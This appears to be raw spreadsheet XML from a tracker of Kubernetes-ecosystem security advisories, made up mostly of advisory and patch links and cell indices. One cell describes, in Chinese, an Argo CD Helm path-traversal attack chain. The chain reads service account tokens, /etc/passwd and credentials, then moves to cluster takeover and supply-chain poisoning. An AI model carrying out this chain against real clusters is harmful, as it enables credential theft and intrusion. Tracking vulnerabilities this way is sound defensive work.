    <hyperlink ref="G13" r:id="rId7" display="https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7"/>
    <hyperlink ref="G11" r:id="rId8" display="https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j"/>
    <hyperlink ref="F22" r:id="rId9" display="Patched versions&#10;0.55.1&#10;&#10;&#10;https://github.com/kubevirt/kubevirt/pull/8198&#10;https://github.com/kubevirt/kubevirt/pull/8268&#10;&#10;"/>
    <hyperlink ref="F23" r:id="rId10" display="kubevirt 0.30&#10;&#10;https://github.com/kubevirt/kubevirt/pull/3686"/>
    <hyperlink ref="G31" r:id="rId11" display="https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9"/>
    <hyperlink ref="G48" r:id="rId12" display="https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7"/>
    <hyperlink ref="G19" r:id="rId13" display="https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww"/>
    <hyperlink ref="F18" r:id="rId14" display="https://github.com/cilium/cilium/pull/35577/commits/1418327b19fddea6ae6c81aea0bcc172367cd845#diff-1c9bc88a1372a2e7d3e61cee951979d630349bfd3181199c6bb3a9f270f4da21"/>
    <hyperlink ref="G20" r:id="rId15" display="https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc"/>
    <hyperlink ref="F21" r:id="rId16" display="https://github.com/istio/istio/pull/41705"/>
    <hyperlink ref="G41" r:id="rId17" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28"/>
    <hyperlink ref="F42" r:id="rId18" display="2.6.1&#10;https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12"/>
    <hyperlink ref="G42" r:id="rId19" display="https://github.com/argoproj/argo-cd/issues/12309&#10;&#10;https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw"/>
    <hyperlink ref="G36" r:id="rId20" display="https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c&#10;&#10;https://github.com/argoproj/argo-events/issues/1947"/>
    <hyperlink ref="J40" r:id="rId21" display="https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/&#10;&#10;&#10; 1..敏感信息泄露&#10;​目标文件：&#10;Kubernetes Secrets（如/var/run/secrets/kubernetes.io/serviceaccount/token）；&#10;其他应用的明文配置文件（如数据库凭证）；&#10;系统敏感文件（如/etc/passwd）。&#10;​攻击步骤：&#10;提交包含恶意valueFiles路径的Helm Chart至仓库；&#10;Argo CD同步时触发helmTemplate逻辑；&#10;url.ParseRequestURI()误判路径为URI，跳过EnforceToCurrentRoot()检查；&#10;读取目标文件内容并解析为YAML参数，通过Argo CD API或UI泄露。&#10;2. ​横向移动与权限提升&#10;​场景延伸：&#10;窃取集群管理员Token，通过kubectl接管集群；&#10;读取其他应用的values.yaml，获取数据库连接字符串等敏感信息；&#10;利用泄露的SSH密钥访问内部系统。&#10;​利用链示例：&#10;mermaid&#10;graph TD&#10;    A[提交恶意Chart] --&gt; B[绕过路径检查]&#10;    B --&gt; C[读取ServiceAccount Token]&#10;    C --&gt; D[通过kubectl执行任意命令]&#10;    D --&gt; E[部署恶意Pod或窃取数据]&#10;3. ​供应链攻击&#10;​污染公共Helm仓库：&#10;攻击者上传包含恶意valueFiles的Chart至公共仓库（如Artifact Hub），诱导用户部署。&#10;​后果：&#10;所有使用该Chart的Argo CD实例自动同步后，敏感数据将泄露至攻击者控制的端点&#10;&#10;"/>
    <hyperlink ref="G35" r:id="rId22" display="https://github.com/argoproj/argo-workflows/issues/6441&#10;&#10;https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h563-xh25-x54q"/>
    <hyperlink ref="G46" r:id="rId23" display="https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr"/>
    <hyperlink ref="G47" r:id="rId24" display="https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673"/>
    <hyperlink ref="F49" r:id="rId25" display="https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a"/>
    <hyperlink ref="G50" r:id="rId26" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3"/>
    <hyperlink ref="G49" r:id="rId27" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v"/>
    <hyperlink ref="G52" r:id="rId28" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp"/>
    <hyperlink ref="F54" r:id="rId29" display="https://github.com/fluxcd/helm-controller/commit/3cd330cc537216d86021675d9ff701bb3d98f1fb#diff-636b2d9b8556d090f81ebb29cd952f88428684befccf637cd1022e060fb45b91"/>
    <hyperlink ref="G22" r:id="rId30" display="https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364&#10;&#10;google research:&#10;https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"/>
    <hyperlink ref="G23" r:id="rId31" display="https://bugzilla.redhat.com/show_bug.cgi?id=1848951"/>
    <hyperlink ref="G17" r:id="rId32" display="https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf"/>
    <hyperlink ref="G58" r:id="rId33" display="https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p"/>
    <hyperlink ref="G61" r:id="rId34" display="https://github.com/cert-manager/cert-manager/security/advisories/GHSA-r4pg-vg54-wxx4"/>
    <hyperlink ref="F61" r:id="rId35" display="Patched versions&#10;v1.16.2,v1.15.4,v1.12.14&#10;&#10;https://github.com/cert-manager/cert-manager/pull/7400&#10;&#10;https://github.com/cert-manager/cert-manager/pull/7400/commits"/>
    <hyperlink ref="G2" r:id="rId36" display="https://github.com/kubernetes/kubernetes/issues/126744"/>
    <hyperlink ref="G53" r:id="rId37" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc" tooltip="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc"/>
    <hyperlink ref="G24" r:id="rId38" display="https://github.com/argoproj/argo-events/security/advisories/GHSA-5q86-62xr-3r57&#10;&#10;https://github.com/argoproj/argo-events/issues/1946"/>
    <hyperlink ref="G32" r:id="rId39" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm"/>
    <hyperlink ref="G33" r:id="rId40" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq"/>
    <hyperlink ref="G67" r:id="rId41" display="https://github.com/kubernetes/kubernetes/issues/131009"/>
    <hyperlink ref="G66" r:id="rId42" display="https://github.com/kubernetes/kubernetes/issues/131006" tooltip="https://github.com/kubernetes/kubernetes/issues/131006"/>
    <hyperlink ref="G65" r:id="rId43" display="https://github.com/kubernetes/kubernetes/issues/131008" tooltip="https://github.com/kubernetes/kubernetes/issues/131008"/>
    <hyperlink ref="G64" r:id="rId44" display="https://github.com/kubernetes/kubernetes/issues/131007" tooltip="https://github.com/kubernetes/kubernetes/issues/131007"/>
    <hyperlink ref="G68" r:id="rId45" display="https://github.com/kubernetes/kubernetes/issues/131005&#10;&#10;https://github.com/advisories/GHSA-242m-6h72-7hgp"/>
    <hyperlink ref="F66" r:id="rId46" display="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf"/>
    <hyperlink ref="F65" r:id="rId47" display="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd9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1048576"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="1" topLeftCell="B2" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.89166666666667" defaultRowHeight="11.25"/>
  <cols>
    <col min="1" max="2" width="8.89166666666667" style="5"/>
    <col min="3" max="5" width="8.89166666666667" style="31"/>
    <col min="6" max="6" width="53.6666666666667" style="5" customWidth="1"/>
    <col min="7" max="7" width="64.775" style="31" customWidth="1"/>
    <col min="8" max="9" width="8.89166666666667" style="5"/>
    <col min="10" max="10" width="41.6666666666667" style="5" customWidth="1"/>
    <col min="11" max="16383" width="8.89166666666667" style="5"/>
  </cols>
  <sheetData>
    <row r="1" s="5" customFormat="1" ht="72" customHeight="1" spans="1:61">
      <c r="A1" s="5" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="5" t="s">
        <v>1014</v>
      </c>
      <c r="C1" s="56" t="s">
        <v>1015</v>
      </c>
      <c r="D1" s="31" t="s">
        <v>1016</v>
      </c>
      <c r="E1" s="31" t="s">
        <v>1017</v>
      </c>
      <c r="F1" s="5" t="s">
        <v>19</v>
      </c>
      <c r="G1" s="31" t="s">
        <v>1018</v>
      </c>
      <c r="H1" s="5" t="s">
        <v>1</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="J1" s="5" t="s">
        <v>3</v>
      </c>
      <c r="K1" s="5" t="s">
        <v>5</v>
      </c>
      <c r="L1" s="5" t="s">
        <v>6</v>
      </c>
      <c r="M1" s="5" t="s">
        <v>7</v>
      </c>
      <c r="N1" s="5" t="s">
        <v>8</v>
      </c>
      <c r="O1" s="5" t="s">
        <v>9</v>
      </c>
      <c r="P1" s="5" t="s">
        <v>10</v>
      </c>
      <c r="Q1" s="5" t="s">
        <v>1019</v>
      </c>
      <c r="R1" s="5" t="s">
        <v>11</v>
      </c>
      <c r="S1" s="5" t="s">
        <v>12</v>
      </c>
      <c r="T1" s="5" t="s">
        <v>13</v>
      </c>
      <c r="U1" s="5" t="s">
        <v>14</v>
      </c>
      <c r="V1" s="5" t="s">
        <v>15</v>
      </c>
      <c r="W1" s="5" t="s">
        <v>1020</v>
      </c>
      <c r="X1" s="5" t="s">
        <v>16</v>
      </c>
      <c r="Y1" s="5" t="s">
        <v>17</v>
      </c>
      <c r="Z1" s="5" t="s">
        <v>18</v>
      </c>
      <c r="AA1" s="5" t="s">
        <v>1021</v>
      </c>
      <c r="AB1" s="5" t="s">
        <v>20</v>
      </c>
      <c r="AC1" s="5" t="s">
        <v>21</v>
      </c>
      <c r="AD1" s="5" t="s">
        <v>22</v>
      </c>
      <c r="AE1" s="5" t="s">
        <v>23</v>
      </c>
      <c r="AF1" s="5" t="s">
        <v>24</v>
      </c>
      <c r="AG1" s="5" t="s">
        <v>25</v>
      </c>
      <c r="AH1" s="5" t="s">
        <v>26</v>
      </c>
      <c r="AI1" s="5" t="s">
        <v>27</v>
      </c>
      <c r="AJ1" s="5" t="s">
        <v>28</v>
      </c>
      <c r="AK1" s="5" t="s">
        <v>29</v>
      </c>
      <c r="AL1" s="5" t="s">
        <v>30</v>
      </c>
      <c r="AM1" s="5" t="s">
        <v>31</v>
      </c>
      <c r="AN1" s="5"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48</v>
      </c>
      <c r="BE1" s="5" t="s">
        <v>49</v>
      </c>
      <c r="BF1" s="5" t="s">
        <v>50</v>
      </c>
      <c r="BG1" s="5" t="s">
        <v>51</v>
      </c>
      <c r="BH1" s="5" t="s">
        <v>52</v>
      </c>
      <c r="BI1" s="5" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="2" s="6" customFormat="1" ht="409.5" spans="1:61">
      <c r="A2" s="6" t="s">
        <v>1022</v>
      </c>
      <c r="B2" s="6" t="s">
        <v>57</v>
      </c>
      <c r="C2" s="31" t="s">
        <v>1023</v>
      </c>
      <c r="D2" s="31" t="s">
        <v>1024</v>
      </c>
      <c r="E2" s="31" t="s">
        <v>1025</v>
      </c>
      <c r="F2" s="6" t="s">
        <v>1026</v>
      </c>
      <c r="G2" s="31" t="s">
        <v>1027</v>
      </c>
      <c r="H2" s="6"/>
      <c r="I2" s="5" t="s">
        <v>1028</v>
      </c>
      <c r="J2" s="6" t="s">
        <v>59</v>
      </c>
      <c r="K2" s="6" t="s">
        <v>61</v>
      </c>
      <c r="L2" s="15" t="s">
        <v>62</v>
      </c>
      <c r="M2" s="6" t="s">
        <v>63</v>
      </c>
      <c r="N2" s="6" t="s">
        <v>64</v>
      </c>
      <c r="O2" s="6" t="s">
        <v>65</v>
      </c>
      <c r="P2" s="6" t="s">
        <v>66</v>
      </c>
      <c r="R2" s="6" t="s">
        <v>67</v>
      </c>
      <c r="S2" s="6" t="s">
        <v>68</v>
      </c>
      <c r="T2" s="6" t="s">
        <v>69</v>
      </c>
      <c r="U2" s="6" t="s">
        <v>70</v>
      </c>
      <c r="V2" s="6" t="s">
        <v>71</v>
      </c>
      <c r="W2" s="6" t="s">
        <v>1029</v>
      </c>
      <c r="X2" s="6" t="s">
        <v>72</v>
      </c>
      <c r="Y2" s="6" t="s">
        <v>73</v>
      </c>
      <c r="Z2" s="6" t="s">
        <v>74</v>
      </c>
      <c r="AA2" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="AB2" s="6" t="s">
        <v>70</v>
      </c>
      <c r="AC2" s="6" t="s">
        <v>76</v>
      </c>
      <c r="AD2" s="6" t="s">
        <v>147</v>
      </c>
      <c r="AE2" s="6" t="s">
        <v>78</v>
      </c>
      <c r="AF2" s="6" t="s">
        <v>79</v>
      </c>
      <c r="AG2" s="6" t="s">
        <v>80</v>
      </c>
      <c r="AH2" s="6" t="s">
        <v>81</v>
      </c>
      <c r="AI2" s="6" t="s">
        <v>82</v>
      </c>
      <c r="AJ2" s="6" t="s">
        <v>83</v>
      </c>
      <c r="AK2" s="6" t="s">
        <v>84</v>
      </c>
      <c r="AL2" s="6" t="s">
        <v>85</v>
      </c>
      <c r="AM2" s="6" t="s">
        <v>86</v>
      </c>
      <c r="AO2" s="6" t="s">
        <v>87</v>
      </c>
      <c r="AQ2" s="6" t="s">
        <v>88</v>
      </c>
      <c r="AR2" s="6" t="s">
        <v>89</v>
      </c>
      <c r="AS2" s="6" t="s">
        <v>90</v>
      </c>
      <c r="AT2" s="6" t="s">
        <v>91</v>
      </c>
      <c r="AU2" s="6" t="s">
        <v>92</v>
      </c>
      <c r="AV2" s="6" t="s">
        <v>1031</v>
      </c>
      <c r="AW2" s="6" t="s">
        <v>94</v>
      </c>
      <c r="AX2" s="6" t="s">
        <v>1032</v>
      </c>
      <c r="AY2" s="6" t="s">
        <v>1033</v>
      </c>
      <c r="AZ2" s="6" t="s">
        <v>97</v>
      </c>
      <c r="BA2" s="6" t="s">
        <v>1034</v>
      </c>
      <c r="BB2" s="6" t="s">
        <v>99</v>
      </c>
      <c r="BC2" s="6" t="s">
        <v>100</v>
      </c>
      <c r="BD2" s="6" t="s">
        <v>1035</v>
      </c>
      <c r="BE2" s="5" t="s">
        <v>1036</v>
      </c>
      <c r="BF2" s="5" t="s">
        <v>1037</v>
      </c>
      <c r="BG2" s="6" t="s">
        <v>104</v>
      </c>
      <c r="BH2" s="5" t="s">
        <v>1038</v>
      </c>
      <c r="BI2" s="5" t="s">
        <v>1039</v>
      </c>
    </row>
    <row r="3" s="6" customFormat="1" ht="409.5" spans="1:61">
      <c r="A3" s="6" t="s">
        <v>107</v>
      </c>
      <c r="B3" s="6" t="s">
        <v>1040</v>
      </c>
      <c r="C3" s="31" t="s">
        <v>1041</v>
      </c>
      <c r="D3" s="31" t="s">
        <v>1042</v>
      </c>
      <c r="E3" s="31" t="s">
        <v>1043</v>
      </c>
      <c r="F3" s="6" t="s">
        <v>116</v>
      </c>
      <c r="G3" s="31" t="s">
        <v>1044</v>
      </c>
      <c r="H3" s="6" t="s">
        <v>108</v>
      </c>
      <c r="I3" s="6"/>
      <c r="J3" s="6" t="s">
        <v>109</v>
      </c>
      <c r="K3" s="6" t="s">
        <v>111</v>
      </c>
      <c r="L3" s="6" t="s">
        <v>112</v>
      </c>
      <c r="M3" s="6" t="s">
        <v>63</v>
      </c>
      <c r="N3" s="6" t="s">
        <v>113</v>
      </c>
      <c r="O3" s="6" t="s">
        <v>1045</v>
      </c>
      <c r="P3" s="6" t="s">
        <v>115</v>
      </c>
      <c r="R3" s="5" t="s">
        <v>67</v>
      </c>
      <c r="S3" s="5" t="s">
        <v>68</v>
      </c>
      <c r="T3" s="5" t="s">
        <v>69</v>
      </c>
      <c r="U3" s="6" t="s">
        <v>70</v>
      </c>
      <c r="V3" s="6" t="s">
        <v>71</v>
      </c>
      <c r="W3" s="6" t="s">
        <v>1029</v>
      </c>
      <c r="X3" s="6" t="s">
        <v>72</v>
      </c>
      <c r="Y3" s="6" t="s">
        <v>73</v>
      </c>
      <c r="Z3" s="6" t="s">
        <v>74</v>
      </c>
      <c r="AA3" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="AB3" s="6" t="s">
        <v>84</v>
      </c>
      <c r="AD3" s="6" t="s">
        <v>117</v>
      </c>
      <c r="AE3" s="6" t="s">
        <v>84</v>
      </c>
      <c r="AF3" s="6" t="s">
        <v>118</v>
      </c>
      <c r="AG3" s="6" t="s">
        <v>119</v>
      </c>
      <c r="AH3" s="6" t="s">
        <v>81</v>
      </c>
      <c r="AI3" s="6" t="s">
        <v>82</v>
      </c>
      <c r="AJ3" s="6" t="s">
        <v>83</v>
      </c>
      <c r="AK3" s="5" t="s">
        <v>84</v>
      </c>
      <c r="AL3" s="5" t="s">
        <v>120</v>
      </c>
      <c r="AM3" s="6" t="s">
        <v>1046</v>
      </c>
      <c r="AO3" s="6" t="s">
        <v>122</v>
      </c>
      <c r="AQ3" s="6" t="s">
        <v>88</v>
      </c>
      <c r="AR3" s="6" t="s">
        <v>89</v>
      </c>
      <c r="AT3" s="6" t="s">
        <v>91</v>
      </c>
      <c r="AU3" s="6" t="s">
        <v>92</v>
      </c>
      <c r="AV3" s="6" t="s">
        <v>1031</v>
      </c>
      <c r="AW3" s="6" t="s">
        <v>94</v>
      </c>
      <c r="AX3" s="6" t="s">
        <v>1032</v>
      </c>
      <c r="AY3" s="6" t="s">
        <v>1033</v>
      </c>
      <c r="AZ3" s="6" t="s">
        <v>97</v>
      </c>
      <c r="BA3" s="6" t="s">
        <v>1034</v>
      </c>
      <c r="BB3" s="5" t="s">
        <v>123</v>
      </c>
      <c r="BC3" s="6" t="s">
        <v>124</v>
      </c>
      <c r="BD3" s="6" t="s">
        <v>125</v>
      </c>
      <c r="BE3" s="5" t="s">
        <v>126</v>
      </c>
      <c r="BF3" s="6" t="s">
        <v>127</v>
      </c>
      <c r="BH3" s="5" t="s">
        <v>1047</v>
      </c>
      <c r="BI3" s="5" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="4" s="6" customFormat="1" ht="409.5" spans="1:61">
      <c r="A4" s="6" t="s">
        <v>131</v>
      </c>
      <c r="B4" s="6" t="s">
        <v>1048</v>
      </c>
      <c r="C4" s="31" t="s">
        <v>1049</v>
      </c>
      <c r="D4" s="31" t="s">
        <v>1050</v>
      </c>
      <c r="E4" s="31" t="s">
        <v>1051</v>
      </c>
      <c r="F4" s="6" t="s">
        <v>116</v>
      </c>
      <c r="G4" s="31" t="s">
        <v>1052</v>
      </c>
      <c r="H4" s="6" t="s">
        <v>71</v>
      </c>
      <c r="I4" s="6"/>
      <c r="J4" s="6" t="s">
        <v>132</v>
      </c>
      <c r="K4" s="6" t="s">
        <v>134</v>
      </c>
      <c r="L4" s="6" t="s">
        <v>135</v>
      </c>
      <c r="M4" s="6" t="s">
        <v>63</v>
      </c>
      <c r="O4" s="6" t="s">
        <v>136</v>
      </c>
      <c r="P4" s="5" t="s">
        <v>137</v>
      </c>
      <c r="Q4" s="5"/>
      <c r="R4" s="5" t="s">
        <v>67</v>
      </c>
      <c r="S4" s="5" t="s">
        <v>68</v>
      </c>
      <c r="T4" s="5" t="s">
        <v>69</v>
      </c>
      <c r="U4" s="6" t="s">
        <v>70</v>
      </c>
      <c r="V4" s="5" t="s">
        <v>71</v>
      </c>
      <c r="W4" s="6" t="s">
        <v>1029</v>
      </c>
      <c r="X4" s="6" t="s">
        <v>72</v>
      </c>
      <c r="Y4" s="6" t="s">
        <v>73</v>
      </c>
      <c r="Z4" s="6" t="s">
        <v>74</v>
      </c>
      <c r="AA4" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="AB4" s="6" t="s">
        <v>84</v>
      </c>
      <c r="AD4" s="6" t="s">
        <v>117</v>
      </c>
      <c r="AE4" s="6" t="s">
        <v>84</v>
      </c>
      <c r="AF4" s="6" t="s">
        <v>118</v>
      </c>
      <c r="AG4" s="6" t="s">
        <v>119</v>
      </c>
      <c r="AH4" s="6" t="s">
        <v>81</v>
      </c>
      <c r="AI4" s="6" t="s">
        <v>82</v>
      </c>
      <c r="AJ4" s="6" t="s">
        <v>83</v>
      </c>
      <c r="AK4" s="5" t="s">
        <v>84</v>
      </c>
      <c r="AL4" s="5" t="s">
        <v>120</v>
      </c>
      <c r="AM4" s="6" t="s">
        <v>1046</v>
      </c>
      <c r="AO4" s="6" t="s">
        <v>122</v>
      </c>
      <c r="AQ4" s="6" t="s">
        <v>88</v>
      </c>
      <c r="AR4" s="6" t="s">
        <v>89</v>
      </c>
      <c r="AT4" s="6" t="s">
        <v>91</v>
      </c>
      <c r="AU4" s="6" t="s">
        <v>92</v>
      </c>
      <c r="AV4" s="6" t="s">
        <v>1031</v>
      </c>
      <c r="AW4" s="6" t="s">
        <v>94</v>
      </c>
      <c r="AX4" s="6" t="s">
        <v>1032</v>
      </c>
      <c r="AY4" s="6" t="s">
        <v>1033</v>
      </c>
      <c r="AZ4" s="6" t="s">
        <v>97</v>
      </c>
      <c r="BA4" s="6" t="s">
        <v>1034</v>
      </c>
      <c r="BB4" s="5" t="s">
        <v>123</v>
      </c>
      <c r="BC4" s="5" t="s">
        <v>124</v>
      </c>
      <c r="BD4" s="5" t="s">
        <v>125</v>
      </c>
      <c r="BE4" s="5" t="s">
        <v>126</v>
      </c>
      <c r="BF4" s="6" t="s">
        <v>127</v>
      </c>
      <c r="BH4" s="5" t="s">
        <v>1047</v>
      </c>
      <c r="BI4" s="5" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="5" s="6" customFormat="1" ht="409.5" spans="1:56">
      <c r="A5" s="6" t="s">
        <v>138</v>
      </c>
      <c r="B5" s="6" t="s">
        <v>1053</v>
      </c>
      <c r="C5" s="31" t="s">
        <v>1054</v>
      </c>
      <c r="D5" s="31" t="s">
        <v>1055</v>
      </c>
      <c r="E5" s="31" t="s">
        <v>1056</v>
      </c>
      <c r="F5" s="6" t="s">
        <v>146</v>
      </c>
      <c r="G5" s="31" t="s">
        <v>1057</v>
      </c>
      <c r="H5" s="6" t="s">
        <v>71</v>
      </c>
      <c r="I5" s="6" t="s">
        <v>139</v>
      </c>
      <c r="J5" s="6" t="s">
        <v>140</v>
      </c>
      <c r="K5" s="6" t="s">
        <v>142</v>
      </c>
      <c r="L5" s="6" t="s">
        <v>143</v>
      </c>
      <c r="M5" s="6" t="s">
        <v>63</v>
      </c>
      <c r="O5" s="6" t="s">
        <v>144</v>
      </c>
      <c r="P5" s="6" t="s">
        <v>145</v>
      </c>
      <c r="R5" s="5" t="s">
        <v>67</v>
      </c>
      <c r="S5" s="5" t="s">
        <v>68</v>
      </c>
      <c r="T5" s="5" t="s">
        <v>69</v>
      </c>
      <c r="U5" s="6" t="s">
        <v>70</v>
      </c>
      <c r="V5" s="6" t="s">
        <v>71</v>
      </c>
      <c r="W5" s="6" t="s">
        <v>1029</v>
      </c>
      <c r="X5" s="6" t="s">
        <v>72</v>
      </c>
      <c r="Y5" s="6" t="s">
        <v>73</v>
      </c>
      <c r="Z5" s="6" t="s">
        <v>74</v>
      </c>
      <c r="AA5" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="AB5" s="6" t="s">
        <v>84</v>
      </c>
      <c r="AD5" s="6" t="s">
        <v>147</v>
      </c>
      <c r="AE5" s="5" t="s">
        <v>78</v>
      </c>
      <c r="AF5" s="6" t="s">
        <v>118</v>
      </c>
      <c r="AG5" s="6" t="s">
        <v>148</v>
      </c>
      <c r="AH5" s="6" t="s">
        <v>81</v>
      </c>
      <c r="AI5" s="6" t="s">
        <v>82</v>
      </c>
      <c r="AJ5" s="6" t="s">
        <v>83</v>
      </c>
      <c r="AK5" s="6" t="s">
        <v>84</v>
      </c>
      <c r="AL5" s="6" t="s">
        <v>85</v>
      </c>
      <c r="AM5" s="6" t="s">
        <v>86</v>
      </c>
      <c r="AO5" s="6" t="s">
        <v>87</v>
      </c>
      <c r="AQ5" s="6" t="s">
        <v>149</v>
      </c>
      <c r="AR5" s="6" t="s">
        <v>89</v>
      </c>
      <c r="AS5" s="6" t="s">
        <v>90</v>
      </c>
      <c r="AT5" s="6" t="s">
        <v>150</v>
      </c>
      <c r="AU5" s="6" t="s">
        <v>92</v>
      </c>
      <c r="AV5" s="6" t="s">
        <v>1031</v>
      </c>
      <c r="AW5" s="6" t="s">
        <v>94</v>
      </c>
      <c r="AX5" s="6" t="s">
        <v>1032</v>
      </c>
      <c r="AY5" s="6" t="s">
        <v>1033</v>
      </c>
      <c r="AZ5" s="6" t="s">
        <v>97</v>
      </c>
      <c r="BA5" s="6" t="s">
        <v>1034</v>
      </c>
      <c r="BB5" s="5" t="s">
        <v>151</v>
      </c>
      <c r="BC5" s="6" t="s">
        <v>100</v>
      </c>
      <c r="BD5" s="6" t="s">
        <v>152</v>
      </c>
    </row>
    <row r="6" s="5" customFormat="1" ht="409.5" spans="1:56">
      <c r="A6" s="5" t="s">
        <v>1058</v>
      </c>
      <c r="B6" s="6" t="s">
        <v>153</v>
      </c>
      <c r="C6" s="31" t="s">
        <v>1059</v>
      </c>
      <c r="D6" s="31" t="s">
        <v>1060</v>
      </c>
      <c r="E6" s="31" t="s">
        <v>1061</v>
      </c>
      <c r="F6" s="5" t="s">
        <v>160</v>
      </c>
      <c r="G6" s="31" t="s">
        <v>1062</v>
      </c>
      <c r="H6" s="5"/>
      <c r="I6" s="5" t="s">
        <v>139</v>
      </c>
      <c r="J6" s="5" t="s">
        <v>154</v>
      </c>
      <c r="K6" s="5" t="s">
        <v>155</v>
      </c>
      <c r="L6" s="5" t="s">
        <v>156</v>
      </c>
      <c r="M6" s="6" t="s">
        <v>63</v>
      </c>
      <c r="O6" s="5" t="s">
        <v>157</v>
      </c>
      <c r="P6" s="5" t="s">
        <v>158</v>
      </c>
      <c r="R6" s="5" t="s">
        <v>67</v>
      </c>
      <c r="S6" s="5" t="s">
        <v>68</v>
      </c>
      <c r="T6" s="5" t="s">
        <v>69</v>
      </c>
      <c r="U6" s="6" t="s">
        <v>70</v>
      </c>
      <c r="V6" s="5" t="s">
        <v>71</v>
      </c>
      <c r="W6" s="6" t="s">
        <v>1029</v>
      </c>
      <c r="X6" s="6" t="s">
        <v>72</v>
      </c>
      <c r="Y6" s="6" t="s">
        <v>73</v>
      </c>
      <c r="Z6" s="6" t="s">
        <v>74</v>
      </c>
      <c r="AA6" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="AB6" s="6" t="s">
        <v>84</v>
      </c>
      <c r="AD6" s="5" t="s">
        <v>147</v>
      </c>
      <c r="AE6" s="5" t="s">
        <v>161</v>
      </c>
      <c r="AF6" s="6" t="s">
        <v>162</v>
      </c>
      <c r="AG6" s="6" t="s">
        <v>163</v>
      </c>
      <c r="AH6" s="6" t="s">
        <v>81</v>
      </c>
      <c r="AI6" s="6" t="s">
        <v>82</v>
      </c>
      <c r="AJ6" s="6" t="s">
        <v>83</v>
      </c>
      <c r="AK6" s="5" t="s">
        <v>84</v>
      </c>
      <c r="AL6" s="5" t="s">
        <v>164</v>
      </c>
      <c r="AM6" s="6" t="s">
        <v>1063</v>
      </c>
      <c r="AN6" s="6"/>
      <c r="AO6" s="6" t="s">
        <v>166</v>
      </c>
      <c r="AP6" s="6"/>
      <c r="AQ6" s="6" t="s">
        <v>88</v>
      </c>
      <c r="AR6" s="6" t="s">
        <v>89</v>
      </c>
      <c r="AS6" s="6" t="s">
        <v>167</v>
      </c>
      <c r="AT6" s="6" t="s">
        <v>150</v>
      </c>
      <c r="AU6" s="6" t="s">
        <v>92</v>
      </c>
      <c r="AV6" s="6" t="s">
        <v>1031</v>
      </c>
      <c r="AW6" s="6" t="s">
        <v>94</v>
      </c>
      <c r="AX6" s="6" t="s">
        <v>1032</v>
      </c>
      <c r="AY6" s="6" t="s">
        <v>1033</v>
      </c>
      <c r="AZ6" s="6" t="s">
        <v>97</v>
      </c>
      <c r="BA6" s="6" t="s">
        <v>1034</v>
      </c>
      <c r="BB6" s="5" t="s">
        <v>151</v>
      </c>
      <c r="BC6" s="6" t="s">
        <v>100</v>
      </c>
      <c r="BD6" s="6" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="7" s="5" customFormat="1" ht="409.5" spans="1:61">
      <c r="A7" s="5" t="s">
        <v>1064</v>
      </c>
      <c r="B7" s="6" t="s">
        <v>171</v>
      </c>
      <c r="C7" s="31" t="s">
        <v>1065</v>
      </c>
      <c r="D7" s="31" t="s">
        <v>1066</v>
      </c>
      <c r="E7" s="31" t="s">
        <v>1067</v>
      </c>
      <c r="F7" s="5" t="s">
        <v>1068</v>
      </c>
      <c r="G7" s="31" t="s">
        <v>1069</v>
      </c>
      <c r="H7" s="5"/>
      <c r="I7" s="5" t="s">
        <v>1028</v>
      </c>
      <c r="J7" s="5" t="s">
        <v>172</v>
      </c>
      <c r="K7" s="5" t="s">
        <v>174</v>
      </c>
      <c r="L7" s="5" t="s">
        <v>175</v>
      </c>
      <c r="M7" s="6" t="s">
        <v>63</v>
      </c>
      <c r="O7" s="5" t="s">
